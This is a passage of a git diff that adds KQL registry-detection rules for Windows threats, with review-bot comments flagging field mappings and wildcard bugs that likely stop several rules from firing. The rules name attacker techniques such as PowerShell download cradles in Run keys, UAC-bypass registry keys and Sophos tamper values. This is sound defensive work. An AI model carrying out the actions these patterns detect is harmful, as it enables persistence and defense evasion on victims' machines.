diff --git a/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql b/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
new file mode 100644
index 00000000..5d665765
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/suspicious_execution_of_renamed_sysinternals_tools_registry.kql
@@ -0,0 +1,12 @@ +// Title: Suspicious Execution Of Renamed Sysinternals Tools - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: high +// Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool) +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where ((RegistryKey contains "\\Active Directory Explorer" or RegistryKey contains "\\Handle" or RegistryKey contains "\\LiveKd" or RegistryKey contains "\\ProcDump" or RegistryKey contains "\\Process Explorer" or RegistryKey contains "\\PsExec" or RegistryKey contains "\\PsLoggedon" or RegistryKey contains "\\PsLoglist" or RegistryKey contains "\\PsPasswd" or RegistryKey contains "\\PsPing" or RegistryKey contains "\\PsService" or RegistryKey contains "\\SDelete") and RegistryKey endswith "\\EulaAccepted") and (not((InitiatingProcessFolderPath endswith "\\ADExplorer.exe" or InitiatingProcessFolderPath endswith "\\ADExplorer64.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe" or InitiatingProcessFolderPath endswith "\\livekd.exe" or InitiatingProcessFolderPath endswith "\\livekd64.exe" or InitiatingProcessFolderPath endswith "\\procdump.exe" or InitiatingProcessFolderPath endswith "\\procdump64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\PsExec.exe" or InitiatingProcessFolderPath endswith "\\PsExec64.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon.exe" or InitiatingProcessFolderPath endswith "\\PsLoggedon64.exe" or InitiatingProcessFolderPath endswith "\\psloglist.exe" or InitiatingProcessFolderPath endswith "\\psloglist64.exe" or InitiatingProcessFolderPath 
endswith "\\pspasswd.exe" or InitiatingProcessFolderPath endswith "\\pspasswd64.exe" or InitiatingProcessFolderPath endswith "\\PsPing.exe" or InitiatingProcessFolderPath endswith "\\PsPing64.exe" or InitiatingProcessFolderPath endswith "\\PsService.exe" or InitiatingProcessFolderPath endswith "\\PsService64.exe" or InitiatingProcessFolderPath endswith "\\sdelete.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql b/KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql new file mode 100644 index 00000000..401bbb74 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_keyboard_layout_load.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Keyboard Layout Load +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-12 +// Level: medium +// Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1588.002 +// False Positives: +// - Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base) + +DeviceRegistryEvents +| where (RegistryValueData contains "00000429" or RegistryValueData contains "00050429" or RegistryValueData contains "0000042a") and (RegistryKey endswith "\\Keyboard Layout\\Preload*" or RegistryKey endswith "\\Keyboard Layout\\Substitutes*") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql b/KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql new file mode 100644 index 00000000..b539e5e4 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_path_in_keyboard_layout_ime_file_registry_value.kql 
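Review bot: The match anchors on `RegistryKey endswith "\\EulaAccepted"`, which assumes the value name is appended to the key path as Sysmon does in TargetObject; in DeviceRegistryEvents the value name is normally reported in `RegistryValueName`, so as written this likely never matches. The faithful form would be `RegistryKey endswith "\\PsExec" and RegistryValueName =~ "EulaAccepted"` (and likewise for the other tools), which also tightens the loose `contains "\\Handle"` fragment. Validate against one real event before relying on it; the hunk spans two physical lines here.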
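Review bot: `RegistryKey endswith "\\Keyboard Layout\\Preload*"` and the `Substitutes*` alternative end in a literal `*`, so neither suffix test can match a real key and the rule never fires. Use `RegistryKey contains "\\Keyboard Layout\\Preload"` and `RegistryKey contains "\\Keyboard Layout\\Substitutes"`. Note the layout IDs are matched with `contains`, so `00000429` embedded in a longer substitute mapping also hits, which broadens scope slightly beyond the exact preload entry.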
@@ -0,0 +1,12 @@ +// Title: Suspicious Path In Keyboard Layout IME File Registry Value +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-21 +// Level: high +// Description: Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. +// Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. +// IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Control\\Keyboard Layouts*" and RegistryKey contains "Ime File") and ((RegistryValueData contains ":\\Perflogs\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\" or RegistryValueData contains "\\Temporary Internet") or ((RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favorites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Favourites\\") or (RegistryValueData contains ":\\Users\\" and RegistryValueData contains "\\Contacts\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql b/KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql new file mode 100644 index 00000000..c8a50768 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_powershell_in_registry_run_keys.kql 
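Review bot: `RegistryKey endswith "\\Control\\Keyboard Layouts*"` carries a literal asterisk, so it can never be true and the whole rule is dead; the companion `contains "Ime File"` shows the intent is a prefix/contains match, i.e. `RegistryKey contains "\\Control\\Keyboard Layouts\\"`. Also confirm whether `Ime File` is part of `RegistryKey` or is reported in `RegistryValueName` for this table, since the second conjunct depends on that.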
@@ -0,0 +1,12 @@ +// Title: Suspicious PowerShell In Registry Run Keys +// Author: frack113, Florian Roth (Nextron Systems) +// Date: 2022-03-17 +// Level: medium +// Description: Detects potential PowerShell commands or code within registry run keys +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate admin or third party scripts. Baseline according to your environment + +DeviceRegistryEvents +| where (RegistryValueData contains "powershell" or RegistryValueData contains "pwsh " or RegistryValueData contains "FromBase64String" or RegistryValueData contains ".DownloadFile(" or RegistryValueData contains ".DownloadString(" or RegistryValueData contains " -w hidden " or RegistryValueData contains " -w 1 " or RegistryValueData contains "-windowstyle hidden" or RegistryValueData contains "-window hidden" or RegistryValueData contains " -nop " or RegistryValueData contains " -encodedcommand " or RegistryValueData contains "-ExecutionPolicy Bypass" or RegistryValueData contains "Invoke-Expression" or RegistryValueData contains "IEX (" or RegistryValueData contains "Invoke-Command" or RegistryValueData contains "ICM -" or RegistryValueData contains "Invoke-WebRequest" or RegistryValueData contains "IWR " or RegistryValueData contains "Invoke-RestMethod" or RegistryValueData contains "IRM " or RegistryValueData contains " -noni " or RegistryValueData contains " -noninteractive ") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") \ No newline at end of file 
diff --git a/KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql b/KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql new file mode 100644 index 00000000..72c85e6e --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_printer_driver_empty_manufacturer.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Printer Driver Empty Manufacturer +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-01 +// Level: high +// Description: Detects a suspicious printer driver installation with an empty Manufacturer value +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675 +// False Positives: +// - Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value + +DeviceRegistryEvents +| where (RegistryValueData =~ "(Empty)" and (RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers" and RegistryKey contains "\\Manufacturer")) and (not((RegistryKey endswith "\\CutePDF Writer v4.0*" or RegistryKey endswith "\\Version-3\\PDF24*" or (RegistryKey endswith "\\VNC Printer (PS)*" or RegistryKey endswith "\\VNC Printer (UD)*")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql b/KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql new file mode 100644 index 00000000..d7f7bd5b --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_service_installed.kql 
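Review bot: The exclusions `RegistryKey endswith "\\CutePDF Writer v4.0*"`, `"\\Version-3\\PDF24*"` and the two VNC entries end in a literal `*`, so none of them ever matches and the allow-list is inert; they should be `contains` tests on those fragments. The positive condition `RegistryValueData =~ "(Empty)"` is Sysmon's sentinel for an empty value; if DeviceRegistryEvents reports an empty string instead, as I believe it does, this rule never fires — `isempty(RegistryValueData) or RegistryValueData =~ "(Empty)"` covers both until confirmed.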
@@ -0,0 +1,13 @@ +// Title: Suspicious Service Installed +// Author: xknow (@xknow_infosec), xorxes (@xor_xes) +// Date: 2019-04-08 +// Level: medium +// Description: Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. +// Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU) +// MITRE Tactic: Defense Evasion +// Tags: attack.t1562.001, attack.defense-evasion +// False Positives: +// - Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it. + +DeviceRegistryEvents +| where (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\PROCEXP152\\ImagePath")) and (not((RegistryValueData contains "\\WINDOWS\\system32\\Drivers\\PROCEXP152.SYS" and (InitiatingProcessFolderPath endswith "\\procexp64.exe" or InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe" or InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\handle.exe" or InitiatingProcessFolderPath endswith "\\handle64.exe")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql b/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql new file mode 100644 index 00000000..ebb6ec9e --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_shell_open_command_registry_modification.kql 
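Review bot: The `in~` list expects exactly `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services\\NalDrv\\ImagePath`; `CurrentControlSet001` is not a real hive path (it is `CurrentControlSet` or `ControlSet001`), so the exact-equality test never succeeds and the rule is dead. `RegistryKey endswith "\\Services\\NalDrv\\ImagePath" or RegistryKey endswith "\\Services\\PROCEXP152\\ImagePath"` is robust to either spelling, assuming the value name is part of `RegistryKey` rather than `RegistryValueName` — check one real event.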
@@ -0,0 +1,14 @@ +// Title: Suspicious Shell Open Command Registry Modification +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2026-01-24 +// Level: medium +// Description: Detects modifications to shell open registry keys that point to suspicious locations typically used by malware for persistence. +// Generally, modifications to the `*\shell\open\command` registry key can indicate an attempt to change the default action for opening files, +// and various UAC bypass or persistence techniques involve modifying these keys to execute malicious scripts or binaries. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1548.002, attack.t1546.001 +// False Positives: +// - Legitimate software installations or updates that modify the shell open command registry keys to these locations. + +DeviceRegistryEvents +| where (RegistryValueData contains "\\$Recycle.Bin\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\Contacts\\" or RegistryValueData contains "\\Music\\" or RegistryValueData contains "\\PerfLogs\\" or RegistryValueData contains "\\Photos\\" or RegistryValueData contains "\\Pictures\\" or RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Videos\\" or RegistryValueData contains "\\Windows\\Temp\\" or RegistryValueData contains "%AppData%" or RegistryValueData contains "%LocalAppData%" or RegistryValueData contains "%Temp%" or RegistryValueData contains "%tmp%") and RegistryKey endswith "\\shell\\open\\command*" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql b/KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql new file mode 100644 index 00000000..e5929ec1 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_shim_database_patching_activity.kql 
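Review bot: `RegistryKey endswith "\\shell\\open\\command*"` has a literal `*` and so never matches, leaving the rule silent. Since the Sigma pattern is a wildcard over the command subkey and its default value, `RegistryKey contains "\\shell\\open\\command"` is the faithful translation. The suspicious-path list itself is reasonable; expect the FP note about installers to apply mostly to the `%AppData%`/`%LocalAppData%` entries.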
@@ -0,0 +1,10 @@ +// Title: Suspicious Shim Database Patching Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-01 +// Level: high +// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom*" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql new file mode 100644 index 00000000..bcf322f4 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_runmru_registry_path_clickfix.kql 
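Review bot: The conjuncts `RegistryKey endswith "...\\AppCompatFlags\\Custom*"` and `RegistryKey endswith "\\csrss.exe"` (etc.) demand two different suffixes of the same string, and the first ends in a literal `*`, so the rule is unsatisfiable. Replace the first with `RegistryKey contains "\\AppCompatFlags\\Custom\\"`. The `endswith "\\svchost.exe"` tests also assume the SDB GUID value name is not appended to `RegistryKey`; confirm the field layout on a real event.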
@@ -0,0 +1,12 @@ +// Title: Suspicious Space Characters in RunMRU Registry Path - ClickFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects the occurrence of numerous space characters in RunMRU registry paths, which may indicate execution via phishing lures using clickfix techniques to hide malicious commands in the Windows Run dialog box from naked eyes. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU*") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql new file mode 100644 index 00000000..0800c15e --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql 
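Review bot: `RegistryKey endswith "...\\Explorer\\RunMRU*"` ends in a literal `*`, so the key condition can never hold and the rule never fires; `RegistryKey contains "\\Explorer\\RunMRU"` is needed. The thirteen `contains` alternatives are all the same 12-space string in this rendering and the last is a single space; if that is really one space it matches nearly every Run entry containing `#` and collapses the whitespace heuristic. The source rule presumably listed distinct run lengths, so check what the converter emitted.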
@@ -0,0 +1,12 @@ +// Title: Suspicious Space Characters in TypedPaths Registry Path - FileFix +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-11-04 +// Level: high +// Description: Detects the occurrence of numerous space characters in TypedPaths registry paths, which may indicate execution via phishing lures using file-fix techniques to hide malicious commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.004, attack.defense-evasion, attack.t1027.010 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryValueData contains "#" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\TypedPaths\\url1") and (RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains "            " or RegistryValueData contains " ") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql b/KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql new file mode 100644 index 00000000..c645dd67 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/sysmon_driver_altitude_change.kql 
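Review bot: `RegistryKey endswith "...\\Explorer\\TypedPaths\\url1"` treats the value name `url1` as part of the key path, which matches Sysmon's TargetObject but, as far as I know, not DeviceRegistryEvents, where it is reported in `RegistryValueName`; if so the rule never matches and should read `RegistryKey endswith "\\Explorer\\TypedPaths" and RegistryValueName =~ "url1"`. The trailing `contains " "` alternative also makes the space-count heuristic trivially true if it is literally one space; verify the converter output against the Sigma source.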
@@ -0,0 +1,13 @@ +// Title: Sysmon Driver Altitude Change +// Author: B.Talebi +// Date: 2022-07-28 +// Level: high +// Description: Detects changes in Sysmon driver altitude value. +// If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate driver altitude change to hide sysmon + +DeviceRegistryEvents +| where RegistryKey endswith "\\Services*" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql new file mode 100644 index 00000000..cf332362 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/system_scripts_autorun_keys_modification.kql @@ -0,0 +1,13 @@ +// Title: System Scripts Autorun Keys Modification +// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) +// Date: 2019-10-25 +// Level: medium +// Description: Detects modification of autostart extensibility point (ASEP) in registry. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 +// False Positives: +// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason +// - Legitimate administrator sets up autorun keys for legitimate reason + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)")) \ No newline at end of file 
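Review bot: `RegistryKey endswith "\\Services*" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude"` requires two different suffixes, and the first ends in a literal `*`, so the condition is never true and this defense-evasion rule is silent. Drop the first conjunct or make it `RegistryKey contains "\\Services\\"`. The `Altitude` value name may also be reported in `RegistryValueName` rather than appended to `RegistryKey` in this table, which would need a second adjustment.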
diff --git a/KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql b/KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql new file mode 100644 index 00000000..86bf9496 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/tamper_with_sophos_av_registry_keys.kql @@ -0,0 +1,12 @@ +// Title: Tamper With Sophos AV Registry Keys +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-02 +// Level: high +// Description: Detects tamper attempts to sophos av functionality via registry key modification +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql b/KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql new file mode 100644 index 00000000..07f21acf --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/trust_access_disable_for_vbapplications.kql 
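Review bot: `RegistryValueData =~ "DWORD (0x00000000)"` is Sysmon's rendering of a DWORD; DeviceRegistryEvents, as far as I know, exposes the type in `RegistryValueType` and the data as a plain numeric string (`"0"`), so this equality probably never holds and the tamper rule is silent. `RegistryValueData in~ ("0", "DWORD (0x00000000)")` keeps both forms until confirmed against a real event. The `\\Config\\SAVEnabled` value names inside `RegistryKey` likely belong in `RegistryValueName` for the same reason.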
@@ -0,0 +1,12 @@ +// Title: Trust Access Disable For VBApplications +// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-22 +// Level: high +// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql new file mode 100644 index 00000000..a6fca729 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/uac_bypass_abusing_winsat_path_parsing_registry.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Abusing Winsat Path Parsing - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-30 +// Level: high +// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql new file mode 100644 index 00000000..a46ce362 
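Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` assumes Sysmon's DWORD formatting; if DeviceRegistryEvents reports `"1"` with `RegistryValueType == "Dword"`, which is my understanding, this `high` rule never fires. `RegistryValueData in~ ("1", "DWORD (0x00000001)")` keeps both forms. `RegistryKey endswith "\\Security\\AccessVBOM"` also presumes the value name is appended to the key path; confirm on a real event and move it to `RegistryValueName` if not.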
--- /dev/null +++ b/KQL/rules/windows/registry/registry_set/uac_bypass_using_windows_media_player_registry.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass Using Windows Media Player - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData =~ "Binary Data" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Store\\C:\\Program Files\\Windows Media Player\\osk.exe" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql new file mode 100644 index 00000000..89695cef --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/uac_bypass_via_event_viewer.kql @@ -0,0 +1,10 @@ +// Title: UAC Bypass via Event Viewer +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects UAC bypass method using Windows event viewer +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceRegistryEvents +| where RegistryKey endswith "\\mscfile\\shell\\open\\command" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql b/KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql new file mode 100644 index 00000000..eea2b462 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/uac_bypass_via_sdclt.kql 
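Review bot: `RegistryValueData =~ "Binary Data"` is Sysmon's placeholder for REG_BINARY contents; DeviceRegistryEvents does not, to my knowledge, emit that string, so the rule would depend entirely on the key match and never fire as written. Consider `RegistryValueType =~ "Binary"` (or dropping the data test) and keeping the `Compatibility Assistant\\Store\\...\\osk.exe` key condition, which is the actual indicator.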
@@ -0,0 +1,10 @@ +// Title: UAC Bypass via Sdclt +// Author: Omer Yampel, Christian Burkard (Nextron Systems) +// Date: 2017-03-17 +// Level: high +// Description: Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, car.2019-04-001 + +DeviceRegistryEvents +| where RegistryKey endswith "Software\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand" or (RegistryValueData matches regex "-1[0-9]{3}\\\\Software\\\\Classes\\\\" and RegistryKey endswith "Software\\Classes\\Folder\\shell\\open\\command\\SymbolicLinkValue") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/uac_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_disabled.kql new file mode 100644 index 00000000..170acc2d --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/uac_disabled.kql @@ -0,0 +1,10 @@ +// Title: UAC Disabled +// Author: frack113 +// Date: 2022-01-05 +// Level: medium +// Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql b/KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql new file mode 100644 index 00000000..6a4f12e4 --- /dev/null +++ b/KQL/rules/windows/registry/registry_set/uac_notification_disabled.kql 
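Review bot: `RegistryValueData =~ "DWORD (0x00000000)"` in the UAC Disabled rule is the Sysmon DWORD rendering; if this table stores the data as `"0"` with the type in `RegistryValueType`, the EnableLUA tamper check never fires. `RegistryValueData in~ ("0", "DWORD (0x00000000)")` is a safe interim form, and `\\Policies\\System\\EnableLUA` may need to be split into `RegistryKey endswith "\\Policies\\System" and RegistryValueName =~ "EnableLUA"` if the value name is not part of `RegistryKey` here.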
@@ -0,0 +1,12 @@
+// Title: UAC Notification Disabled
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-05-10
+// Level: medium
+// Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value.
